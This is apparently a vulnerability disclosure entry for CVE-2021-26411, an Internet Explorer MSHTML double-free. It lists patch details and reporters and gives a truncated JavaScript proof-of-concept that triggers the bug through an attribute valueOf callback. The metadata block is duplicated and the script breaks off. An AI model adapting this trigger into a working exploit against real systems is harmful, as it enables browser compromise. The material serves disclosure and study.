CVE-2021-26411: Internet Explorer MSHTML Double-Free
Disclosure or Patch Date: 9 March 2021
Product: Microsoft Internet Explorer
Advisory: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26411
Affected Versions: KB4601319 and previous
First Patched Version: KB5000802
Issue/Bug Report: N/A
Patch CL: N/A
Bug-Introducing CL: N/A
Reporter(s): yangkang(@dnpushme) & huangyi(@C0rk1_H) & Enki
Proof-of-concept:
Product: Microsoft Internet Explorer
Advisory: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26411
Affected Versions: KB4601319 and previous
First Patched Version: KB5000802
Issue/Bug Report: N/A
Patch CL: N/A
Bug-Introducing CL: N/A
Reporter(s): yangkang(@dnpushme) & huangyi(@C0rk1_H) & Enki
Proof-of-concept:
< script>
String.prototype.repeat = function (size) { return new Array(size + 1).join(this) }
var ele = document.createElement('element')
var attr1 = document.createAttribute('attribute')
attr1.nodeValue = {
valueOf: function() {
alert('callback')
alert(ele.attributes.length)
ele.clearAttributes()
alert(ele.attributes.length)
}
}
ele.setAttributeNode(attr1)
ele.setAttribute('attr2', 'AAAAAAAA')
ele.removeAttributeNode(attr1)
Join the conversation